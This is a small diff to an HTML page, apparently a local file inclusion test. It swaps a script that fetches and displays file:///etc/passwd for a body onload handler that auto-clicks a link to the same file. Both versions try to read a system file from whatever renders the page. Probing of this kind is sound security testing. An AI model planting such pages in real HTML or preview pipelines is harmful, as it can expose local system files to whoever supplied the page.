--- a/index.html
+++ b/index.html
@@ -1,12 +1,6 @@
 <html>
-<body>
-    <h1>LFI Test</h1>
-    <pre id="output">Trying to fetch local files...</pre>
-    <script>
-        fetch('file:///etc/passwd')
-        .then(response => response.text())
-        .then(data => { document.getElementById('output').innerText = data; })
-        .catch(error => { console.error("Access denied:", error); });
-    </script>
+<body onload="document.getElementById('clicker').click();">
+NOT YET
+<a id="clicker" href="file:///etc/passwd">clicke</a>
 </body>
 </html>
